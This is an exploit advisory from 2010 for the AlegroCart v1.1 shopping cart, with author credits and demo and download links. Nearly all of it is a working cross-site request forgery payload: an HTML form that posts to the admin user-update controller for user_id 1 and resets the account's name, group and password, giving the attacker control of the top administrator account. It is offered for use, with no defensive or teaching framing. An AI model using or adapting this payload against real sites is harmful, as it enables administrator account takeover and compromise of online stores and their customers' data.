[#]----------------------------------------------------------------[#] # # [+] Home Of AlegroCart v1.1 - [ Xsrf] Change Administrator Password # # // Author Info # [x] Author: The.Morpheus # [x] Contact: fats0L@windowslive.com<mailto:fats0L@windowslive.com> # [x] Thanks: Trksec.?nfo ~ Nd And Tg Tayfa :P # [x] Date : 01.02.2010 # [#]-------------------------------------------------------------------------------------------[#] # Demo : http://www.alegrocart.com/ # Download : http://forum.alegrocart.com/viewtopic.php?f=8&t=4 # [x] Exploit : # # [ XSRF ] # # [ Login ] # http://[server]/[path]/admin/ # # // Start XSRF |-------------------------------------------------------------------------------| <form action="http://www.alegrocart.com/demo/admin/?controller=user&user_id=1&action=update;action=update" method="post" enctype="multipart/form-data" id="form"> width="185"><span class="required">*</span> Username:</td> <input type="text" name="username" value="admin"> <span class="required">*</span> First Name:</td> <input type="text" name="firstname" value="admin"> <span class="required">*</span> Last Name:</td> <input type="text" name="lastname" value="admin"> <td>E-Mail:</td> <input type="text" name="email" value="admin"></td> <td>User Group:</td> <td><select name="user_group_id"> <option value="1" selected>Top Administrator</option> </select></td> <td>Password:</td> <input type="password" name="password" value="" > <td>Confirm:</td> <input type="password" name="confirm" value=""> </form> |-------------------------------------------------------------------------------| # // End of attack ~ # [#]------------------------------------------------------------------------------------------[#]